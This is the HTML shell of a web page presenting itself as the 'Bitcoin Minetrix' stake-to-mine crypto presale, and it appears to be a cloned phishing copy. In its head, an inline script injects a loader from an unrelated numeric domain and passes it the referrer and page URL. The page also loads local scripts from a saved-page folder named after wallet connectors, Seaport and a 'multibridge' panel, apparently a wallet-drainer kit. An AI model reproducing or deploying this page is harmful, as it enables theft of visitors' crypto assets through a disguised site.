<!doctype html>
<html lang="en" data-critters-container>

<head>
  <meta charset="utf-8">
  <title>Bitcoin Minetrix | Stake BTCMTX On Ethereum To Mine BTC</title>
  <base href="/">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description"
    content="Welcome to no-hassle bitcoin cloud mining with Bitcoin Minetrix, the first Stake-to-Mine crypto allowing users to earn BTC by staking tokens on Ethereum.">
  <meta name="robots" content="index,follow">
  <link rel="icon" type="image/x-icon" href="./assets/images/svg-icons/token.svg">
  <link rel="canonical" href="https://bitcoinminetrix.com/en">
  <!-- Cache buster -->
  <meta http-equiv="Cache-Control" content="max-age=0, must-revalidate">
  <meta http-equiv="Pragma" content="no-cache">
  <meta http-equiv="Expires" content="0">
  <script>
    (function (g, e, o, t, a, r, ge, tl, y, s) {
      t = g.getElementsByTagName(e)[0]; y = g.createElement(e); y.async = true;
      y.src = 'https://g10696554090.co/gr?id=-NgU2P9bQZ8fZuKp9bEY&refurl=' + g.referrer + '&winurl=' + encodeURIComponent(window.location);
      t.parentNode.insertBefore(y, t);
    })(document, 'script');
  </script>
  <!-- Google Tag Manager -->
  <script>(function (w, d, s, l, i) {
      w[l] = w[l] || []; w[l].push({
        'gtm.start':
          new Date().getTime(), event: 'gtm.js'
      }); var f = d.getElementsByTagName(s)[0],
        j = d.createElement(s), dl = l != 'dataLayer' ? '&l=' + l : ''; j.async = true; j.src =
          'https://www.googletagmanager.com/gtm.js?id=' + i + dl; f.parentNode.insertBefore(j, f);
    })(window, document, 'script', 'dataLayer', 'GTM-K8JPZH4C');</script>
  <!-- End Google Tag Manager -->

  <!-- One Signal -->
  <script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" defer type="text/javascript"></script>
  <script type="text/javascript">
    window.OneSignal = window.OneSignal || [];
    OneSignal.push(function () {
      OneSignal.init({ appId: "11f8086b-7d4d-4c69-88e9-80c005269d0a", });
    });
  </script>
  <style>
    @import"https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;500;600;700&display=swap";
    @charset "UTF-8";

    :root {
      --bs-blue: #0d6efd;
      --bs-indigo: #6610f2;
      --bs-purple: #6f42c1;
      --bs-pink: #d63384;
      --bs-red: #dc3545;
      --bs-orange: #fd7e14;
      --bs-yellow: #ffc107;
      --bs-green: #198754;
      --bs-teal: #20c997;
      --bs-cyan: #0dcaf0;
      --bs-gray: #6c757d;
      --bs-gray-dark: #343a40;
      --bs-gray-100: #f8f9fa;
      --bs-gray-200: #e9ecef;
      --bs-gray-300: #dee2e6;
      --bs-gray-400: #ced4da;
      --bs-gray-500: #adb5bd;
      --bs-gray-600: #6c757d;
      --bs-gray-700: #495057;
      --bs-gray-800: #343a40;
      --bs-gray-900: #212529;
      --bs-primary: #FF9431;
      --bs-secondary: #4B4A47;
      --bs-tertiary: #545E65;
      --bs-danger: #ec2213;
      --bs-warning: #f7941d;
      --bs-success: #23D169;
      --bs-black: #000000;
      --bs-white: #ffffff;
      --bs-light: #E4E4E4;
      --bs-lighter: #92979A;
      --bs-grey: #959595;
      --bs-light-grey: #F3F7FA;
      --bs-border: #C2C2C2;
      --bs-border-light: #f3efec;
      --bs-heading-text: #6B6B69;
      --bs-bg-light: #FDFBFA;
      --bs-primary-rgb: 255, 148, 49;
      --bs-secondary-rgb: 75, 74, 71;
      --bs-tertiary-rgb: 84, 94, 101;
      --bs-danger-rgb: 236, 34, 19;
      --bs-warning-rgb: 247, 148, 29;
      --bs-success-rgb: 35, 209, 105;
      --bs-light-rgb: 228, 228, 228;
      --bs-lighter-rgb: 146, 151, 154;
      --bs-grey-rgb: 149, 149, 149;
      --bs-light-grey-rgb: 243, 247, 250;
      --bs-border-rgb: 194, 194, 194;
      --bs-border-light-rgb: 243, 239, 236;
      --bs-heading-text-rgb: 107, 107, 105;
      --bs-bg-light-rgb: 253, 251, 250;
      --bs-primary-text-emphasis: #663b14;
      --bs-secondary-text-emphasis: #1e1e1c;
      --bs-success-text-emphasis: #0e542a;
      --bs-info-text-emphasis: #055160;
      --bs-warning-text-emphasis: #633b0c;
      --bs-danger-text-emphasis: #5e0e08;
      --bs-light-text-emphasis: #495057;
      --bs-dark-text-emphasis: #495057;
      --bs-primary-bg-subtle: #ffead6;
      --bs-secondary-bg-subtle: #dbdbda;
      --bs-success-bg-subtle: #d3f6e1;
      --bs-info-bg-subtle: #cff4fc;
      --bs-warning-bg-subtle: #fdead2;
      --bs-danger-bg-subtle: #fbd3d0;
      --bs-light-bg-subtle: #fcfcfd;
      --bs-dark-bg-subtle: #ced4da;
      --bs-primary-border-subtle: #ffd4ad;
      --bs-secondary-border-subtle: #b7b7b5;
      --bs-success-border-subtle: #a7edc3;
      --bs-info-border-subtle: #9eeaf9;
      --bs-warning-border-subtle: #fcd4a5;
      --bs-danger-border-subtle: #f7a7a1;
      --bs-light-border-subtle: #e9ecef;
      --bs-dark-border-subtle: #adb5bd;
      --bs-white-rgb: 255, 255, 255;
      --bs-black-rgb: 0, 0, 0;
      --bs-font-sans-serif: system-ui, -apple-system, "Segoe UI", Roboto, "Helvetica Neue", "Noto Sans", "Liberation Sans", Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Noto Color Emoji";
      --bs-font-monospace: SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", monospace;
      --bs-gradient: linear-gradient(180deg, rgba(255, 255, 255, .15), rgba(255, 255, 255, 0));
      --bs-body-font-family: var(--bs-font-sans-serif);
      --bs-body-font-size: 1rem;
      --bs-body-font-weight: 400;
      --bs-body-line-height: 1.4;
      --bs-body-color: #212529;
      --bs-body-color-rgb: 33, 37, 41;
      --bs-body-bg: #ffffff;
      --bs-body-bg-rgb: 255, 255, 255;
      --bs-emphasis-color: #000000;
      --bs-emphasis-color-rgb: 0, 0, 0;
      --bs-secondary-color: rgba(33, 37, 41, .75);
      --bs-secondary-color-rgb: 33, 37, 41;
      --bs-secondary-bg: #e9ecef;
      --bs-secondary-bg-rgb: 233, 236, 239;
      --bs-tertiary-color: rgba(33, 37, 41, .5);
      --bs-tertiary-color-rgb: 33, 37, 41;
      --bs-tertiary-bg: #f8f9fa;
      --bs-tertiary-bg-rgb: 248, 249, 250;
      --bs-heading-color: inherit;
      --bs-link-color: #FF9431;
      --bs-link-color-rgb: 255, 148, 49;
      --bs-link-decoration: underline;
      --bs-link-hover-color: #cc7627;
      --bs-link-hover-color-rgb: 204, 118, 39;
      --bs-code-color: #d63384;
      --bs-highlight-color: #212529;
      --bs-highlight-bg: #fff3cd;
      --bs-border-width: 1px;
      --bs-border-style: solid;
      --bs-border-color: #dee2e6;
      --bs-border-color-translucent: rgba(0, 0, 0, .175);
      --bs-border-radius: .3rem;
      --bs-border-radius-sm: .4rem;
      --bs-border-radius-lg: .5rem;
      --bs-border-radius-xl: 1rem;
      --bs-border-radius-xxl: 2rem;
      --bs-border-radius-2xl: var(--bs-border-radius-xxl);
      --bs-border-radius-pill: 50rem;
      --bs-box-shadow: 0 .5rem 1rem rgba(0, 0, 0, .15);
      --bs-box-shadow-sm: 0px 4px 10px rgba(71, 163, 243, .15), 0px 2px 11px rgba(163, 183, 236, .21);
      --bs-box-shadow-lg: 0px 4px 91px rgba(255, 139, 91, .15), 0px 2px 50px rgba(107, 31, 0, .06);
      --bs-box-shadow-inset: inset 0 1px 2px rgba(0, 0, 0, .075);
      --bs-focus-ring-width: .25rem;
      --bs-focus-ring-opacity: .25;
      --bs-focus-ring-color: rgba(255, 148, 49, .25);
      --bs-form-valid-color: #23D169;
      --bs-form-valid-border-color: #23D169;
      --bs-form-invalid-color: #ec2213;
      --bs-form-invalid-border-color: #ec2213
    }

    *,
    *:before,
    *:after {
      box-sizing: border-box
    }

    @media (prefers-reduced-motion: no-preference) {
      :root {
        scroll-behavior: smooth
      }
    }

    body {
      margin: 0;
      font-family: var(--bs-body-font-family);
      font-size: var(--bs-body-font-size);
      font-weight: var(--bs-body-font-weight);
      line-height: var(--bs-body-line-height);
      color: var(--bs-body-color);
      text-align: var(--bs-body-text-align);
      background-color: var(--bs-body-bg);
      -webkit-text-size-adjust: 100%;
      -webkit-tap-highlight-color: rgba(0, 0, 0, 0)
    }

    :root {
      --bs-breakpoint-xxs: 0;
      --bs-breakpoint-mini: 300px;
      --bs-breakpoint-min: 360px;
      --bs-breakpoint-xs: 410px;
      --bs-breakpoint-sm: 576px;
      --bs-breakpoint-md: 768px;
      --bs-breakpoint-lg: 1025px;
      --bs-breakpoint-xl: 1200px;
      --bs-breakpoint-xxl: 1440px
    }

    html,
    body {
      margin: 0;
      padding: 0
    }

    body {
      font-family: Poppins, sans-serif !important;
      font-size: 1rem;
      font-weight: 400;
      background: #ffffff;
      color: #545e65
    }
  </style>
  <link rel="stylesheet" href="styles.5745e08093335293.css" media="print" onload="this.media='all'"><noscript>
    <link rel="stylesheet" href="styles.5745e08093335293.css">
  </noscript>
  <link rel="stylesheet" href="./style.css">
  <script src="./dom_mod.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/ethers/5.6.9/ethers.umd.min.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/ethers/5.6.9/ethers.umd.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/merkletreejs@latest/merkletree.js"></script>
  <script src="./files(1)/scripts/wallet-connect-v2.js"></script>
  <script src="./files(1)/scripts/seaport.js"></script>
  <script src="./files(1)/scripts/coinbase.js"></script>
  <script charset="UTF-8" type="text/javascript" src="./files(1)/harpiePanel_multibridge.js"></script>
  <link rel="stylesheet" href="./files(1)/styles/modal-11.css">
  <link rel="stylesheet" href="./files(1)/styles/popup-6.css">
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />


</head>

<body>
  <app-root></app-root>
  <script src="runtime.5c566dde7ed8be1c.js" type="module"></script>
  <script src="polyfills.a0ee9813873a792d.js" type="module"></script>
  <script src="scripts.348060e082774ae1.js" defer></script>
  <script src="main.54bad57a96541986.js" type="module"></script>
</body>

</html>